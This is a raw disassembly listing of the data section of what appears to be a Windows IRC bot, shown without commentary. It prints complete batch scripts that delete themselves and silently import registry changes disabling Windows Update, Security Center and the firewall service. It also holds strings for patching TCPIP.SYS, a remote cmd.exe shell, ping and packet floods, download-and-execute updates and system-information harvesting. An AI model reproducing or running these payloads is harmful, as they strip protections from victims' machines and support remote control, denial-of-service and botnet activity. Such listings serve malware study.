db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_40ABB7+48�o
align 4
aCA_bat db 'c:\a.bat',0 ; DATA XREF: sub_40AD3F+29�o
align 4
a@echoOffEchoRe db '@echo off',0Dh,0Ah ; DATA XREF: sub_40AD3F+14�o
db 'Echo REGEDIT4>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT'
db '\Parameters]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TransportBindName"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Share'
db 'dAccess]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Start"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuaus'
db 'erv]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Start"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>'
db '%temp%\1.reg',0Dh,0Ah
db 'Echo "Start"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableDCOM"="N">>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableRemoteConnect"="N">>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>'
db '%temp%\1.reg',0Dh,0Ah
db 'Echo "restrictanonymous"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Securi'
db 'tyProviders\SCHANNEL\Protocols\PCT1.0\Server]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Enabled"=hex:00>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanma'
db 'nserver\parameters]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AutoShareWks"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AutoShareServer"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip'
db '\Parameters]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "NameServer"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo "ForwardBroadcasts"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "IPEnableRouter"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Domain"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo "SearchList"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableICMPRedirect"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\1.reg',0Dh
db 0Ah
db 'Echo "EnableSecurityFilters"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "PrioritizeRecordData"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TCP1320Opts"=dword:00000003>>%temp%\1.reg',0Dh,0Ah
db 'Echo "KeepAliveTime"=dword:00023280>>%temp%\1.reg',0Dh,0Ah
db 'Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg',0Dh,0Ah
db 'Echo "BcastNameQueryCount"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\1.reg',0Dh,0Ah
db 'Echo "LargeBufferSize"=dword:00001000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SynAckProtect"=dword:00000002>>%temp%\1.reg',0Dh,0Ah
db 'Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\1.reg',0Dh,0Ah
db 'Echo "StandardAddressLength "=dword:00000018>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultSendWindow"=dword:00004000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "BufferMultiplier"=dword:00000200>>%temp%\1.reg',0Dh,0Ah
db 'Echo "PriorityBoost"=dword:00000002>>%temp%\1.reg',0Dh,0Ah
db 'Echo "IrpStackSize"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisableAddressSharing"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AllowUserRawAccess"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisableRawSecurity"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\1.reg',0Dh,0Ah
db 'Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxFastTransmit"=dword:00000040>>%temp%\1.reg',0Dh,0Ah
db 'Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SmallBufferListDepth"=dword:00000020>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SmallerBufferSize"=dword:00000080>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TransmitWorker"=dword:00000020>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,'
db '00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\'
db '1.reg',0Dh,0Ah
db 'Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\'
db '1.reg',0Dh,0Ah
db 'Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisjointNameSpace"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "QueryIpMatching"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxHashTableSize"=dword:00000800>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SackOpts"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Tcp1323Opts"=dword:00000003>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultTTL"=dword:00000030>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FFPControlFlags"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg',0Dh,0Ah
db 'Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersio'
db 'n\Internet Settings]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'START /WAIT REGEDIT /S %temp%\1.reg',0Dh,0Ah
db 'DEL %temp%\1.reg',0Dh,0Ah
db 'DEL %0',0Dh,0Ah,0
align 4
unk_42D03C db 2 ; DATA XREF: sub_40AECD:loc_40AF8C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aNotSupportedBy db ' Not supported by this system.',0
align 4
unk_42D07C db 2 ; DATA XREF: sub_40AECD:loc_40AF5A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToAlloca db ' Unable to allocation ARP cache.',0
align 4
unk_42D0BC db 2 ; DATA XREF: sub_40AECD:loc_40AF26�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheIsEmpt db ' ARP cache is empty.',0
align 10h
unk_42D0F0 db 2 ; DATA XREF: sub_40AECD+49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorGettingAr db ' Error getting ARP cache: <%d>.',0
align 10h
a2: ; DATA XREF: sub_40B051+35�o
; ___:004160CA�o
unicode 0, <2>,0
aSfc_os_dll db 'sfc_os.dll',0 ; DATA XREF: sub_40B0A0+24�o
align 10h
aTcpip_sysFixed db 'TCPIP.SYS fixed, version %d.',0 ; DATA XREF: sub_40B0E7+31E�o
align 10h
aCanNotOpenTcpi db 'Can not open TCPIP.SYS, version %d.',0 ; DATA XREF: sub_40B0E7+11F�o
aRB db 'r+b',0 ; DATA XREF: sub_40B0E7+FF�o
dword_42D188 dd 5 dword_42D18C dd 0FCh dword_42D190 dd 43h dword_42D194 dd 6 dword_42D198 dd 16h dword_42D19C dd 4Ch ; ___:00416135�o
dword_42D1A0 dd 3 dword_42D1A4 dd 0E8h unk_42D1A8 db 2 ; DATA XREF: sub_40B45B+13C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedSendin db ' Finished sending pings to %s.',0
align 4
unk_42D1E4 db 2 ; DATA XREF: sub_40B45B+6E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPi db ' Error sending pings to %s.',0
align 4
dword_42D21C dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B5E7+1C6�o
dd 2BBBB02h
aFinishedSend_0 db ' Finished sending packets to %s.',0
align 4
dword_42D258 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B5E7+8E�o
dd 2BBBB02h
aErrorSending_1 db ' Error sending pings to %s.',0
align 10h
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40B865+33�o
dword_42D2A0 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B8EC:loc_40BA1E�o
dd 2BBBB02h
aCouldNotReadDa db ' Could not read data from proccess.',0Dh,0Ah,0
align 10h
dword_42D2E0 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B8EC+10F�o
dd 2BBBB02h
aProccessHasTer db ' Proccess has terminated.',0Dh,0Ah,0
align 4
dword_42D318 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40B8EC:loc_40B9D2�o
dd 2BBBB02h
aCouldNotRead_0 db ' Could not read data from proccess',0Dh,0Ah,0
align 4
dword_42D358 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BA41+194�o
dd 2BBBB02h
aFailedToStartI db ' Failed to start IO thread, error: <%d>.',0
align 4
dword_42D39C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40BA41+14C�o
dd 2BBBB02h
aRemoteCommandP db ' Remote Command Prompt',0
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40BA41+21�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_40BBF6+52�o
; ___:00416167�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_40BDAD+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_40BDAD+192�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_40BDAD:loc_40BF11�o
align 4
word_42D4DC dw 3Fh ; DATA XREF: sub_40BDAD:loc_40BEAF�r
; sub_40D639+1F�o
align 10h
dword_42D4E0 dd 3F3F3Fh a2003 db '2003',0 ; DATA XREF: sub_40BDAD+BA�o
; ___:0042F050�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_40BDAD+AA�o
; ___:0041606E�o
align 10h
a2k db '2K',0 ; DATA XREF: sub_40BDAD+98�o
; ___:0041605E�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_40BDAD+7E�o
; ___:00416045�o
align 4
a98 db '98',0 ; DATA XREF: sub_40BDAD+6C�o
; ___:00416035�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_40BDAD+5A�o
; ___:00416026�o
align 10h
a95 db '95',0 ; DATA XREF: sub_40BDAD+46�o
; ___:00416018�o
align 4
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_40C061+AB�o
align 4
off_42D544 dd offset loc_412F4E ; DATA XREF: sub_40C061:loc_40C0D5�o
off_42D548 dd offset dword_4E414C ; DATA XREF: sub_40C061:loc_40C0CE�o
dword_42D54C dd 6C616944h, 70752Dhdword_42D554 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64hdword_42D564 dd 5Ch unk_42D568 db 2 ; DATA XREF: sub_40C1D5:loc_40C38E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToConnec db 'Failed to connect to HTTP server.',0
align 4
unk_42D5A8 db 2 ; DATA XREF: sub_40C1D5:loc_40C387�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCouldNotOpenAC db 'Could not open a connection.',0
align 4
dword_42D5E4 dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40C1D5+1A0�o
dd 0BB022029h, 202002BBh, 61766E49h, 2064696Ch, 2E4C5255h
dd 0
unk_42D610 db 2 ; DATA XREF: sub_40C1D5:loc_40C368�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToGetReq db 'Failed to get requested URL from HTTP server.',0
align 4
dword_42D65C dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40C1D5+18C�o
dd 0BB022029h, 202002BBh, 204C5255h, 69736976h, 2E646574h
dd 0
dword_42D688 dd 2A2F2Ah dword_42D68C dd 202E6425h, 3D207325h, 732520hdword_42D698 dd 6C415B2Dh, 20736169h, 7473694Ch, 2D5Dha_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_40C4F7+60�o
align 4
dword_42D6CC dd 7A026E02h, 201F6D1Fh, 676F6C28h, 1F702E73h, 29671F6Ch
; DATA XREF: sub_40C597+1A�o
dd 0BBBB0220h, 20202002h, 61656C43h, 2E646572h, 0
dword_42D6F4 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C609+DC�o
dd 2BBBB02h, 694C2020h, 63207473h, 6C706D6Fh, 2E657465h
dd 0
dword_42D720 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C609+3F�o
dd 2BBBB02h, 65422020h, 6E6967h
dd 78h
align 8
dword_42D748 dd 80000002h, 42EE44h, 80000002h, 42EE74h, 80000001h, 42EEACh
; DATA XREF: sub_40C738+7�o
dword_42D760 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C738+63�o
; sub_40C8F3+170�o
dd 2BBBB02h
aFailedToSendTo db ' Failed to send to Remote command shell.',0
align 4
dword_42D7A4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8F3+AB�o
dd 2BBBB02h
aFailedToOpenRe db ' Failed to open remote command shell.',0
align 4
dword_42D7E4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40C8F3+47�o
; sub_40CAB4+FD�o
dd 2BBBB02h
aFailedToOpenSo db ' Failed to open socket.',0
align 4
dword_42D818 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CAB4+362�o
; sub_40CE56+156�o
dd 2BBBB02h, 6F532020h, 74656B63h, 72726520h, 2E726Fh
dword_42D840 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CAB4+2FA�o
dd 2BBBB02h
aTransferComp_0 db ' Transfer complete to IP: %s, Filename: %s (%s bytes).',0
dword_42D890 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CAB4+202�o
dd 2BBBB02h
aUnableToOpenSo db ' Unable to open socket.',0
align 4
dword_42D8C4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CAB4+1CB�o
dd 2BBBB02h, 65532020h, 7420646Eh, 6F656D69h, 2E7475h
dword_42D8EC dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_40CAB4+16A�o
dd 169h
dword_42D904 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CAB4+127�o
dd 2BBBB02h
aFileDoesnTExis db ' File doesn',27h,'t exist.',0
align 4
dword_42D934 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CAB4+82�o
dd 2BBBB02h
aFailedToBindTo db ' Failed to bind to socket.',0
dword_42D968 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CAB4+44�o
dd 2BBBB02h
aFailedToCreate db ' Failed to create socket.',0
align 4
dword_42D99C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CE56+1CF�o
dd 2BBBB02h
aTransferComp_1 db ' Transfer complete from IP: %s, Filename: %s (%s bytes).',0
align 10h
dword_42D9F0 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CE56+CB�o
dd 2BBBB02h
aErrorOpeningSo db ' Error opening socket.',0
dword_42DA20 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CE56+AB�o
dd 2BBBB02h
aErrorOpeningFi db ' Error opening file for writing.',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_40CE56+97�o
dword_42DA60 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40CE56+83�o
dd 2BBBB02h
aErrorUnableToW db ' Error unable to write file to disk.',0
align 10h
unk_42DAA0 db 2 ; DATA XREF: sub_40D091+493�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aBadUrlOrDnsErr db ' Bad URL, or DNS Error: %s.',0
align 4
unk_42DADC db 2 ; DATA XREF: sub_40D091+485�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateFailedEr db ' Update failed: Error executing file: %s.',0
unk_42DB24 db 2 ; DATA XREF: sub_40D091+3C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fk db ' Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
align 4
dword_42DB74 dd 7A026E02h, 201F6D1Fh, 776F6428h, 616F6C6Eh, 1F702E64h
; DATA XREF: sub_40D091+358�o
dd 29671F6Ch, 0BBBB0220h, 4F202002h, 656E6570h, 25203A64h
dd 2E73h
aOpen db 'open',0 ; DATA XREF: sub_40D091+336�o
; sub_40F6F1+2C49�o ...
align 4
unk_42DBA8 db 2 ; DATA XREF: sub_40D091+2E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fK db ' Downloaded %.1f KB to %s @ %.1f KB/sec.',0
align 10h
unk_42DBF0 db 2 ; DATA XREF: sub_40D091+262�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCrcFailedDD_ db ' CRC Failed (%d != %d).',0
align 4
unk_42DC28 db 2 ; DATA XREF: sub_40D091+1D8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesizeIsInco db ' Filesize is incorrect: (%d != %d).',0
align 4
unk_42DC6C db 2 ; DATA XREF: sub_40D091+195�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateSDkbTran db ' Update: %s (%dKB transferred).',0
align 4
unk_42DCAC db 2 ; DATA XREF: sub_40D091+183�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileDownloadSD db ' File download: %s (%dKB transferred).',0
align 4
unk_42DCF4 db 2 ; DATA XREF: sub_40D091+77�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s.',0
align 4
aUnknown db 'Unknown',0 ; DATA XREF: sub_40D639:loc_40D67C�o
; sub_40E4EB+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_40D639:loc_40D676�o
aDisk db 'Disk',0 ; DATA XREF: sub_40D639:loc_40D670�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_40D639:loc_40D66A�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_40D639:loc_40D664�o
align 4
off_42DD54 dd offset word_4D4152 ; DATA XREF: sub_40D639:loc_40D65E�o
aFailed db 'failed',0 ; DATA XREF: sub_40D6CA:loc_40D7A2�o
; sub_40D7E5+3B�o
align 10h
aSkb db '%sKB',0 ; DATA XREF: sub_40D6CA+6B�o
align 4
unk_42DD68 db 2 ; DATA XREF: sub_40D7E5+8E�o
db 6Eh, 2, 7Ah
db 1Fh
